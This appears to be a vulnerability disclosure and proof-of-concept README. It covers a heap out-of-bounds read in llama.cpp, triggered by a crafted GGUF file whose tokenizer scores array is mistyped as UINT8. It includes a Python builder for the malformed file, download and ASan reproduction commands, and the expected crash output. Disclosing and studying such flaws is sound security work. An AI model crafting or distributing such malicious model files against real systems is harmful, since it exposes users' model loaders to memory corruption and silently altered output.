How to use with the llama-cpp-python library
# !pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama.from_pretrained(
	repo_id="VincHmann/gguf-security-poc",
	filename="poc_mutated_real.gguf",
)
output = llm(
	"Once upon a time,",
	max_tokens=512,
	echo=True
)
print(output)

GGUF Vocabulary Loading Heap OOB Read — PoC

Vulnerability

Heap out-of-bounds read in llama.cpp vocabulary loading due to missing GGUF array element-type validation. llama-vocab.cpp casts the result of gguf_get_arr_data() to float* without verifying the stored element type via gguf_get_arr_type(). A GGUF file that declares tokenizer.ggml.scores as GGUF_TYPE_UINT8 (1 byte per element) therefore triggers 4-byte float reads from a buffer allocated at 1 byte per element.

The file is accepted by the GGUF parser without error; the OOB read happens later in llama_vocab::impl::load() during llama_model_load_from_file().
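The type-confusion arithmetic can be sketched in a few lines. This is an illustration of the size mismatch only, not llama.cpp code; the buffer and names here are hypothetical stand-ins for the parsed scores array:

```python
import struct

# Hypothetical stand-in for the parsed tokenizer.ggml.scores payload:
# the file declares UINT8 elements, so the parser allocates 1 byte per token.
n_tokens = 32000
uint8_payload = bytes(n_tokens)  # 32000-byte buffer

# The vulnerable loader reads 4-byte floats for every token, i.e. it
# expects n_tokens * 4 = 128000 bytes from a 32000-byte region.
bytes_expected = n_tokens * struct.calcsize("<f")  # 128000
oob_bytes = bytes_expected - len(uint8_payload)    # 96000 bytes read OOB

print(f"buffer: {len(uint8_payload)} B, read: {bytes_expected} B, "
      f"OOB: {oob_bytes} B")

# Only the first len(buffer) // 4 = 8000 "floats" even come from the
# buffer itself; the remaining 24000 reads land past the allocation.
in_bounds_floats = len(uint8_payload) // struct.calcsize("<f")  # 8000
```

This matches the ASan report below: the first read past the end faults "0 bytes after" the 32000-byte region.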

Repository contents

| File | SHA256 | Description |
|---|---|---|
| poc_mutated_real.gguf | 56addd738324fb7b2b21a8a970848d1f59115ea96882e1190b0fc98c60f04787 | Mutated from a real LLaMA SPM vocab (32000 tokens). Scores array element type changed from FLOAT32 to UINT8; payload truncated to match. All other metadata unchanged. |
| mutate_real_gguf.py | — | Script used to create the PoC from the original vocab file. |
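To make the malformed metadata concrete, here is a minimal sketch that hand-builds a metadata-only GGUF v3 file whose tokenizer.ggml.scores array claims UINT8 elements. This is not the author's mutate_real_gguf.py (which patches a genuine vocab file so that all other required metadata stays valid); it only follows the public GGUF layout and type codes (UINT8 = 0, FLOAT32 = 6, ARRAY = 9):

```python
import struct

# GGUF value-type codes from the public GGUF spec (ggml's gguf.h).
GGUF_TYPE_UINT8   = 0
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_ARRAY   = 9

def build_malformed_gguf(path, n_tokens=32000):
    """Write a minimal GGUF v3 file whose scores array declares UINT8
    elements (1 byte each) where the loader expects FLOAT32 (4 bytes)."""
    key = b"tokenizer.ggml.scores"
    with open(path, "wb") as f:
        f.write(b"GGUF")                              # magic
        f.write(struct.pack("<I", 3))                 # version
        f.write(struct.pack("<Q", 0))                 # tensor count
        f.write(struct.pack("<Q", 1))                 # metadata KV count
        # single KV pair: key string, then an ARRAY value
        f.write(struct.pack("<Q", len(key)))          # key length
        f.write(key)
        f.write(struct.pack("<I", GGUF_TYPE_ARRAY))   # value type
        f.write(struct.pack("<I", GGUF_TYPE_UINT8))   # element type: the lie
        f.write(struct.pack("<Q", n_tokens))          # element count
        f.write(bytes(n_tokens))                      # 1 byte per element

build_malformed_gguf("malformed_scores.gguf")
```

A file built this way would likely be rejected for other missing metadata (architecture, token list, etc.) before the scores are read, which is why the actual PoC mutates a complete real vocab file instead.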

How to reproduce

1. Clone and build llama.cpp with AddressSanitizer

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build-asan && cd build-asan
cmake .. \
  -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_BUILD_TYPE=Debug
cmake --build . -j$(nproc)
cd ..

2. Download PoC and run

huggingface-cli download VincHmann/gguf-security-poc poc_mutated_real.gguf --local-dir .

ASAN_OPTIONS='detect_leaks=0' ./build-asan/bin/llama-tokenize -m poc_mutated_real.gguf --prompt 'test'

Note: --prompt is required by the tool's CLI, but the crash occurs during llama_model_load_from_file() before the prompt is processed.

3. Expected output

==PID==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
READ of size 4 at 0x... thread T0
    #0 in llama_vocab::impl::load(...) src/llama-vocab.cpp:2229

0x... is located 0 bytes after 32000-byte region

Tested on

  • llama.cpp commit d0a6dfeb2 (HEAD, 2026-04-06)
  • Ubuntu (WSL2), g++ 13, cmake 3.28
  • AddressSanitizer + UndefinedBehaviorSanitizer

Impact

The heap OOB read (up to 96 KB past the allocation for a 32000-token vocabulary: 32000 four-byte float reads over a 32000-byte buffer) occurs during the standard llama_model_load_from_file() call, i.e. on any attempt to load the file. Without ASan, the out-of-bounds bytes are silently interpreted as token scores and alter tokenization output.
